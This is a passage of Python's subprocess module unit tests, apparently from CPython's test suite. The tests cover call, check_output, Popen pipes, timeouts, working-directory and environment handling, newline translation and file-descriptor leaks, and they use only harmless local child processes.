def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises((FileNotFoundError, PermissionError),
self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
class _PathLikeObj:
def __fspath__(self):
return temp_dir
self._assert_cwd(temp_dir, sys.executable, cwd=_PathLikeObj())
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
        # null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
        # null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
        # equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
        # equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
        # A Python debug build pushes something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
